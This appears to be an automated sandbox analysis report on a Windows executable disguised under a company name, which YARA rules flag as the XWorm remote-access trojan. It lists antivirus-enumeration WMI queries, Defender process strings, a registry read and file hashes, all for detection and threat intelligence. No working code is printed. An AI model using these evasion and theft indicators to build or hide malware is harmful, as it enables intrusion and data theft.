Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

AV process strings found (often used to terminate AV products)

Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4548014985.00000000070FF000.00000004.00000020.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4548014985.00000000070E0000.00000004.00000020.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4523604892.000000000160A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4548014985.00000000070E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: er\MsMpeng.exe

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 10.2.RTUZKYTc.exe.319a66c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RTUZKYTc.exe.3191590.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RTUZKYTc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RTUZKYTc.exe.3191590.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 5148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RTUZKYTc.exe PID: 7324, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RTUZKYTc.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 1992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 7320, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 10.2.RTUZKYTc.exe.319a66c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.36917b8.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RTUZKYTc.exe.3191590.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RTUZKYTc.exe.319a66c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.RTUZKYTc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 27.2.SS Bottmac Engineers Pvt. Ltd..exe.369a894.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.RTUZKYTc.exe.3191590.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.3177a6c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32cd6ac.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SS Bottmac Engineers Pvt. Ltd..exe.32c45d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.SS Bottmac Engineers Pvt. Ltd..exe.316e990.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000010.00000002.2163931121.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2073252953.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2150760883.00000000031E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001B.00000002.2469960785.00000000036E4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 5148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RTUZKYTc.exe PID: 7324, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RTUZKYTc.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 1992, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 7320, type: MEMORYSTR

ID:	1545926
Product:	CloudBasic
Start time:	10:30:07
Start date:	31.10.2024
Sample:	SS Bottmac Engineers Pvt. Ltd..exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	ff9e45d7326698f34526793bf1244811
SHA1:	b3ff69abfe1c5e6633a866ffbebe2139a69e3f0a
SHA256:	4db566fcdc413fe50153dc8431ae86192241f0e1e86071f80d42eb6e0fb5baca
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RTUZKYTc.exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SS Bottmac Engineers Pvt. Ltd..exe.log	ASCII text, with CRLF line terminators	1330C80CAAC9A0FB172F202485E9B1E8	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	0065122BB5759BA8A4BAC6ACDBEDC9DC	353E9A4100CA43455810CD95CA78C5175F6F799F	214E4E0D00F3967A8F89D59A421B8556A61FEA2152BF5D730AEF5326779B24E0
